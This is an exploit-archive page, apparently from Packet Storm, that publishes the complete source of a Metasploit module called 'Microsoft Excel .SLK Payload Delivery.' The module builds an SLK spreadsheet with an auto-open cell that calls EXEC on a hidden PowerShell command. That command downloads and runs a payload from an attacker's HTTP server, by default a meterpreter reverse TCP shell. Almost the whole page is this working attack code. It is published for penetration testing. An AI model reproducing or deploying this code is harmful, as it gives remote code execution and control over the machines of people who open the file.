exploit the possibilities

Microsoft Excel .SLK Payload Delivery

Microsoft Excel .SLK Payload Delivery
Posted Feb 12, 2019
Authored by Stan Hegt, Carter Brainerd, Pieter Ceelen | Site metasploit.com

This Metasploit module generates a download and execute Powershell command to be placed in an .SLK Excel spreadsheet. When executed, it will retrieve a payload via HTTP from a web server. When the file is opened, the user will be prompted to "Enable Content." Once this is pressed, the payload will execute.

tags | exploit, web
MD5 | 94d9c996172414156065a8ee4e017837

Microsoft Excel .SLK Payload Delivery

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking

include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Powershell
include Msf::Exploit::EXE

def initialize(info = {})
super(update_info(info,
'Name' => "Microsoft Excel .SLK Payload Delivery",
'Description' => %Q{
This module generates a download and execute Powershell
command to be placed in an .SLK Excel spreadsheet.
When executed, it will retrieve a payload via HTTP
from a web server. When the file is opened, the
user will be prompted to "Enable Content." Once
this is pressed, the payload will execute.
},
'Author' => [
'Carter Brainerd', # cbrnrd; Metasploit module
'Stan Hegt', # @StanHacked; Discovery
'Pieter Ceelen' # @ptrpieter; Discovery
],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://blog.appriver.com/2018/02/trojan-droppers-using-symbolic-link-files'],
['URL', 'https://www.twitter.com/StanHacked/status/1049047727403937795'],
['URL', 'http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen']
],
'Platform' => 'win', # idk about other platforms
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
['Microsoft Excel', {} ]
],
'DisclosureDate' => 'Oct 7 2018',
'DefaultTarget' => 0,
'Payload' =>
{
'DisableNops' => true
},
'DefaultOptions' =>
{
'DisablePayloadHandler' => false,
'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
'EXITFUNC' => 'thread'
}
))

register_options([
OptString.new('FILENAME', [true, "Filename to save as", "#{rand_text_alphanumeric 8}.slk"])
])
end

def on_request_uri(cli, request)
if request.raw_uri.to_s.end_with? '.slk'
print_status("Handling request for .slk from #{cli.peerhost}")
payload = gen_psh("#{get_uri}", "string")
data = create_slk(payload)
send_response(cli, data, 'Content-Type' => 'text/plain')
else
print_status("Delivering payload to #{cli.peerhost}...")
p = regenerate_payload(cli)
data = cmd_psh_payload(p.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)
send_response(cli, data, 'Content-Type' => 'application/octet-stream')
end
end

# I might be able to do without this (using cmd_psh_payload() and encode_final_payload() in Msf::Exploit::Powershell)
def gen_psh(url, *method)
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl

if method.include? 'string'
download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
else
# Random filename to use, if there isn't anything set
random = "#{rand_text_alphanumeric 8}.exe"
# Set filename (Use random filename if empty)
filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']

# Set path (Use %TEMP% if empty)
path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}')

# Join Path and Filename
file = %Q(echo (#{path}+'\\#{filename}'))

# Generate download PowerShell command
download_string = Rex::Powershell::PshMethods.download_run(url, file)
end

download_and_run = "#{ignore_cert}#{download_string}"

# Generate main PowerShell command
return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
end

def create_slk(cmd)
content = "ID;P\n"
content << "O;E\n"
content << "NN;NAuto_open;ER101C1;KOut Flank;F\n"
content << "C;X1;Y101;EEXEC(\"#{cmd}\")\n" # Execute command
content << "C;X1;Y102;EHALT()\n"
content << "E"
content
end

def primer
file_create(create_slk(gen_psh("#{get_uri}", 'string')))
end
end
Login or Register to add favorites

File Archive:

February 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    33 Files
  • 2
    Feb 2nd
    30 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    8 Files
  • 5
    Feb 5th
    11 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    1 Files
  • 8
    Feb 8th
    37 Files
  • 9
    Feb 9th
    15 Files
  • 10
    Feb 10th
    11 Files
  • 11
    Feb 11th
    26 Files
  • 12
    Feb 12th
    8 Files
  • 13
    Feb 13th
    1 Files
  • 14
    Feb 14th
    1 Files
  • 15
    Feb 15th
    9 Files
  • 16
    Feb 16th
    33 Files
  • 17
    Feb 17th
    6 Files
  • 18
    Feb 18th
    10 Files
  • 19
    Feb 19th
    20 Files
  • 20
    Feb 20th
    1 Files
  • 21
    Feb 21st
    1 Files
  • 22
    Feb 22nd
    17 Files
  • 23
    Feb 23rd
    15 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    28 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close